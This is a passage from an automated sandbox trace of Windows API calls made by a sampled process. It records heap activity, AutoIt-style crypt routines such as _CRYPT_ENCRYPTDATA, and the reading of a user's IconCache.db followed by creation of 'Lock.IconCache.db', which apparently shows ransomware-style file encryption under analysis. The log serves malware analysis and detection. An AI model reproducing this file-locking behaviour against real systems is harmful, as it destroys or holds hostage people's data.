returned 0x2e54e88 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0242.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0242.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0242.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0242.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0242.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0242.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0242.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0242.732] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0242.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f044d0 | out: hHeap=0x970000) returned 1 [0242.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0242.732] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0242.732] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0242.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e698c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0242.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0242.733] CryptDestroyHash (hHash=0xa87610) returned 1 [0242.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0242.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0242.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.733] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0242.734] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.734] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0242.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0242.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0242.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0242.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0242.735] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978528 [0242.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0242.735] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0242.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978528 | out: hHeap=0x970000) returned 1 [0242.735] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0242.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0242.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0242.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0242.737] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0242.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0242.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0242.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0242.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0242.739] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0242.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0242.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0242.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0242.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0242.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5d020 [0242.743] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0242.743] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0242.783] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x3441, lpOverlapped=0x0) returned 1 [0242.784] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0242.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0242.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0242.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0242.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0242.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13441) returned 0x2f14818 [0242.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5d020 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0242.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0242.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0242.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0242.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13441) returned 0x2f27c68 [0242.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0242.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0242.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13441) returned 0x2f14818 [0242.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0242.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0242.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0242.792] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0242.793] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0242.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0242.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0242.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0242.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0242.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0242.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0242.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0242.795] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0242.795] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04690 [0242.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0242.795] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0242.796] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0242.796] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.796] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04380 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0242.796] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0242.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0242.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0242.796] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 